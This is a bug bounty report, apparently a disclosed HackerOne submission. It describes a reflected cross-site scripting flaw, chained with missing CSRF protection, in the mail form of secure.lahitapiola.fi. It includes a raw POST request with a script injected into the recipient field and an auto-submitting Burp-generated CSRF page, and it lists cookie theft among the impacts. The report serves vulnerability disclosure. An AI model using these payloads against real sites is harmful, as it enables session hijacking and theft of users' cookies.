LocalTapiola: Reflected XSS+CSRF on secure.lahitapiola.fi

2018-02-09T20:18:24
ID H1:314518
Type hackerone
Reporter putsi
Modified 2018-03-02T04:01:12

Description

Basic report information

Summary: The secure.lahitapiola.fi -mail application contains a reflected XSS vulnerability which can be exploited for example with CSRF-attack.

Description: As mentioned in the summary, the site contains a reflected cross-site scripting vulnerability. This vulnerability is present on the recipient-parameter which is used to specify destination email address of the email.

This recipient-parameter is normally not used on the first page of the email-flow, however by manually injecting it to the POST-request we can introduce an email address which will be placed on the resulting HTML-page as unsanitized value.

As the same functionality lacks any CSRF-protection, a CSRF-page can be crafted which will trigger the reflected XSS vulnerability when opened.

Impact: The vulnerability can be used at least to do the following: - Create open redirects via javascript. - Read all cookies that are scoped to lahitapiola-domain instead of the subdomain. - Read cookies of the secure-subdomain. - Maybe something else but I'm too tired to think and will post a comment if anything new pops up.

Browsers / Apps Verified In:

  • Firefox

Steps To Reproduce:

  1. Host the attached CSRF-PoC on a external server.
  2. Open the hosted file with Firefox or any other browser that does not do proper XSS-sanitation.
  3. Notice, that the reflected xss triggered and was run in context of the secure.lahitapiola.fi-domain.

Additional material

Simple PoC-request for the XSS:

``` POST /index.cgi HTTP/1.1 Host: secure.lahitapiola.fi Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 164

sender=█████████%40rot.fi&page=2&lang=en&charset=utf-8&formsubmit=Continue&recipient=no-reply"/></noscript><script>alert(document.domain)</script>@lahitapiola.fi ```

Example attack by chaining to CSRF: &lt;html&gt; &lt;!-- CSRF PoC - generated by Burp Suite Professional --&gt; &lt;body&gt; &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt; &lt;form action="https://secure.lahitapiola.fi/index.cgi" method="POST"&gt; &lt;input type="hidden" name="sender" value="secure&#45;█████&#64;rot&#46;fi" /&gt; &lt;input type="hidden" name="page" value="2" /&gt; &lt;input type="hidden" name="lang" value="en" /&gt; &lt;input type="hidden" name="charset" value="utf&#45;8" /&gt; &lt;input type="hidden" name="formsubmit" value="Continue" /&gt; &lt;input type="hidden" name="recipient" value="no&#45;reply&quot;&#47;&gt;&lt;&#47;noscript&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;&#64;lahitapiola&#46;fi" /&gt; &lt;input type="submit" value="Submit request" /&gt; &lt;/form&gt; &lt;script&gt; document.forms[0].submit(); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt;

Impact

The vulnerability can be used at least to do the following: - Create open redirects via javascript. - Read all cookies that are scoped to lahitapiola-domain instead of the subdomain. - Read cookies of the secure-subdomain. - Maybe something else but I'm too tired to think and will post a comment if anything new pops up.